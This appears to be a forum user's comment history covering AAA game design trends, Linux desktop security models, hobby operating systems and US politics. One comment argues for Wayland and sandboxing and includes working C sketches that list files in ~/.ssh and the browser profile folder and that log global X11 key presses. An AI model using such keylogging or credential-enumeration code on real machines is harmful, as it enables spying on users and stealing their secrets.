• 1 Post
  • 239 Comments
Joined 1 year ago
Cake day: May 29th, 2024



  • So, when I mention the Assassin’s Creed / Far Cry / GTA triangle I really mean to say the poor imitators of those games. They did do some very innovative things when they first came out, but just like modern military shooters took regenerating health and the two weapon limit from Halo while leaving behind all the other gameplay mechanics that made that work, so too did many games adopt the open world and the general way you interact with it, while removing anything interesting. By “the way you interact with it” I’m referring specifically to the map unlocking, the collectables, the village / territory faction control, and the “heat” system that spawns enemies depending on how much attention you are generating.

    IMO those sorts of games were very much the other side of the coin from CoD-likes, and the problem was that while the extremely linear levels of CoD-likes were too restrictive, these open world games had no structure at all. In games like Blood, Quake, or what have you, encounters are designed to flow in a certain way, with each one having its own flavor and favoring certain approaches over others. In some games you can even think of enemy encounters as a puzzle you need to solve. Level design and enemy placement of course form the two halves of encounter design. In good games this sort of thing extends to the structure of the game as a whole, with the ebbs and flows in the action, and different gameplay happening in different sections so the formula keeps getting changed up.

    But in games where the level design is an open world that lets you approach from any angle, and where enemy placement is determined on the fly by a mindless algorithm, there is no encounter design. At the same time, the way enemy spawning works is too orchestrated to allow for interesting emergent gameplay. For example, if an algorithm made an enemy patrol spawn an hour ago, and the player can see it from across the map, they can come up with their own plan for dealing with that unique situation. If the player gets one bar of heat and the algorithm makes an enemy spawn around a corner, they can’t anticipate that at all; it’s just mindless. This has implications for the gameplay itself (no enemy can be very tough or require much thinking or planning if you’re just going to spawn them around a corner) but also, as previously stated, for the entire structure of the game.

    As for the other games you mention, I want to bring up BioShock in particular. It’s true, that game is a master class in presentation and aesthetics, and a game I would highly recommend, but it’s actually one of the games that I remember people complaining about when they said gaming was better in the 90s. Specifically, they pointed to the way BioShock was very dumbed down compared to its predecessor System Shock, both from a general game and level design standpoint, and also because of the inclusion of Vita-Chambers and the compass pointer that leads you around by the nose. (One place I will give BioShock points, though, is that it has way more of an ecosystem than most imm-sims, with the way enemies interact with each other; it even beats out imm-sim darling Prey (2017) in this regard.)

    This is admittedly a way more niche complaint than people complaining about QTEs or games being piss/brown, but it was definitely part of the much larger “games are getting dumbed down” discourse.

    I could talk about Crysis and Spore too, but this comment is already really long. I haven’t played the rest of the games you list, so I can’t offer an opinion on them, though I have heard that KOTOR was very good.



  • 20 years ago people were complaining about the same lack of creativity in the AAA scene, saying that gaming was better in the 90s. In fact I remember it was a common talking point that AAA gaming had gotten so bad that there would surely be another crash like the one in '83.

    Here’s how I see it:
    From a gameplay standpoint: My perception of the mid to late 2000s is that every AAA game was either a modern military shooter, a ‘superhero’ game (think Prototype or Infamous), or fell somewhere in the Assassin’s Creed / Far Cry / GTA triangle. Gameplay was also getting more and more trivial and braindead, with more and more QTE cutscenes. The perception among both game devs and journalists was that this was a good direction for the industry to go in, as it was getting away from the ‘coin sucking difficulty’ mentality of arcade games and moving towards games as art (i.e. cinematic experiences). There were of course a few games like Mirror’s Edge, and games released by Valve, but they were definitely the exception rather than the rule (and Valve eventually stopped making games). Then Dark Souls came out and blew their minds by showing that a game could have non-braindead gameplay and be artful at the same time.

    Now I would say we’ve seen a partial reversal of this trend. Triple A games are still not likely to be pioneers when it comes to gameplay, but we’ve actually seen a few mainstream franchises do things like adopting Souls-like combat or immersive-sim elements, which IMO would have been unthinkable 15 years ago.

    From an aesthetic standpoint: My perception of the mid to late 2000s is that everything was brown with a yellow piss filter over it. If you were lucky it could be grey and desaturated instead. This was because Band of Brothers existed, and because it was the easiest way to make lighting look good given how lighting tech worked at the time. As an aside, Dark Souls, a game where you crawl around in a sewer filled with poop and everyone is a zombie that’s also slowly dying of depression because the world is going to end soon and they’ve lost all hope, had more color than the average 2000s game where you’re some sort of hero or badass secret agent.

    Things are absolutely better in the aesthetic department now. Triple A studios remembered what colors looked like.

    From a conceptual / narrative standpoint: I don’t think AAA games were very creative in this department in the 2000s and I don’t think they’re very creative now. They mostly just competed to see who could fellate the player the hardest to make them feel like a badass. If you were lucky the player character was also self destructive and depressed in addition to being a badass.

    Then and now your best bet for a creative premise in a high budget game is to look to Japanese developers.

    From a consumer friendliness / monetization standpoint: In the 2000s people were already complaining about day one DLC and about having to pay multiple times just to get a complete game.

    Now it’s worse than it’s ever been IMO. Not only do AAA games come out completely broken and unfinished, but really aggressive monetization strategies are completely normalized. Companies are also pretty reluctant to make singleplayer games now, since it’s easier to farm infinite gacha rolls from a multiplayer game (although this was kinda already the case in the 2000s).

    Overall I think we’re now in a golden age for indie games, and things like Clair Obscur and Baldur’s Gate 3 give me a lot of hope for AA games.




  • Yeah, it doesn’t actually make much of a difference:

    Fundamentally the idea of having a separate admin account, which is completely protected, and a user account where everything can mingle together and see everything else, is a 1960s security model. It was originally created for a world where the owner of the computer and the user of the computer were two different people. In that world the user provides all the software that they want to run in their account (they probably wrote it) and the OS’s job is to protect the admin account from users and the users from each other.

    Fast forward to the present day and this security model is completely mismatched with the reality of a personal computer. The internet exists, the user and owner are the same person, and they’re probably not writing all their software themselves. A piece of malicious or compromised software can encrypt every file in your user folder, steal your browser history and your saved passwords, and (on X11) record your keystrokes and make your screen display anything it wants, all without privilege escalation. But you can rest assured knowing that the user account can’t violate any timesharing limits that the root account placed on it.
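
    To make that concrete, here’s a minimal sketch in C of what “no privilege escalation needed” means. It runs as an ordinary user and uses nothing but the normal file APIs; the specific paths (.ssh, .mozilla) are just examples of where sensitive data tends to live, not an exhaustive list.

        /* Sketch: an ordinary unprivileged process poking around. */
        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>
        #include <errno.h>
        #include <dirent.h>

        int main(void) {
            const char *home = getenv("HOME");
            char path[4096];
            if (!home) return 1;

            /* The 1960s model holds up fine here: root's files are off limits. */
            DIR *d = opendir("/root");
            printf("/root: %s\n", d ? "readable" : strerror(errno));
            if (d) closedir(d);

            /* But everything the user actually cares about is wide open,
             * because this process runs under the same UID. */
            snprintf(path, sizeof path, "%s/.ssh", home);
            d = opendir(path);
            if (d) {
                struct dirent *e;
                while ((e = readdir(d)) != NULL)
                    printf("key material: %s/%s\n", path, e->d_name);
                closedir(d);
            }

            snprintf(path, sizeof path, "%s/.mozilla", home);
            d = opendir(path);
            printf("browser profile %s: %s\n", path, d ? "readable" : "not present");
            if (d) closedir(d);
            return 0;
        }

    A ransomware payload is the same loop with a write call in it. The OS enforces exactly what it was designed to enforce; it’s just enforcing the wrong boundary for a single-user machine.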

    The one thing you could argue is that a separate admin account makes it easier to detect and fix a compromised user account, but:

    1. Most people are not in the habit of regularly logging into their root account and examining all the processes that are running in their user account. In fact many distributions ship with the root account locked, so you never log into it directly at all.

    2. If you do think your computer has been compromised, the sensible thing is to wipe the disk and restore from backup. It doesn’t make any sense to fiddle around trying to figure out just how compromised you are and trying to reverse the process on a running system.

    3. If you’re running X11, I hope you never install updates or type your password for any other reason while some malicious software is running, since, as previously stated, anything running under your account can record your keystrokes. In that case your admin account is compromised anyway, without any privilege escalation exploits. Can you see how all this stuff was built on the assumption that the user and the owner are two separate people with two separate passwords? (A sketch of what that keystroke snooping looks like follows this list.)
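
    Since point 3 tends to sound like an exaggeration, here’s a minimal sketch of what that snooping looks like. It uses only XQueryKeymap, a core X11 call that any client connected to the session’s display may issue, focused window or not; no privileges, no extensions. It prints raw keycodes rather than characters, and the filename in the build comment is made up.

        /* Sketch: poll the global X11 keyboard state from an
         * unprivileged client. Build with: cc snoop.c -lX11 */
        #include <stdio.h>
        #include <string.h>
        #include <unistd.h>
        #include <X11/Xlib.h>

        int main(void) {
            Display *dpy = XOpenDisplay(NULL); /* the user's session display */
            char prev[32] = {0};
            if (!dpy) return 1;

            for (;;) {
                char keys[32];
                /* Core protocol: one bit per keycode, for the whole display,
                 * regardless of which window currently has focus. */
                XQueryKeymap(dpy, keys);
                for (int i = 0; i < 256; i++) {
                    int down = keys[i / 8] & (1 << (i % 8));
                    int was  = prev[i / 8] & (1 << (i % 8));
                    if (down && !was)
                        printf("keycode %d pressed\n", i);
                }
                memcpy(prev, keys, sizeof keys);
                usleep(10 * 1000); /* 10 ms polling is plenty to capture typing */
            }
        }

    This is exactly the kind of thing Wayland was designed to stop: under Wayland a client only sees input directed at its own surfaces.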

    With Wayland and containerized applications we are slowly moving away from that 1960s security posture, which is something that’s long overdue. But currently something like Linux Mint is not really much better off than Haiku, from a pure security model standpoint.

    In any case its security model is not the interesting thing about Haiku.



  • Neither Haiku nor 9front uses systemd, and they’re both very interesting from a technical and design perspective (though not for their init systems).

    If it has to be a Linux distribution I would say Damn Small Linux (DSL), because it’s really impressive just how few resources it requires. You can run X11 and even browse the web (using Dillo) on a system that’s small enough to fit in the L3 cache of some modern CPUs.

    I don’t daily drive any of these though, so they might not count as my “favorite”.







  • This is a little bit like having AIDS, getting a flare-up, and then saying “well I’m glad at least something is happening”.

    I understand the frustration at the general political ambivalence following “the end of history” in the 90s and the endless wars in the 2000s, but a flare-up isn’t going to make the AIDS go away. Even in the absolute best-case, frankly impossible scenario where everything that’s been going on miraculously stops tomorrow, we’re still locked into another 50+ years of consequences from this administration, just as we still have problems today that trace back to the Reagan administration.

    In a worse scenario, well, let’s just say that neither Germany nor Italy today is particularly better off or more progressive than its neighbors. Like I said, having a flare-up does not cure your AIDS.

    If someone has a counterexample from history I would genuinely love to hear it, because at this point I’ve given up hope of the world becoming a socially better place in my lifetime.






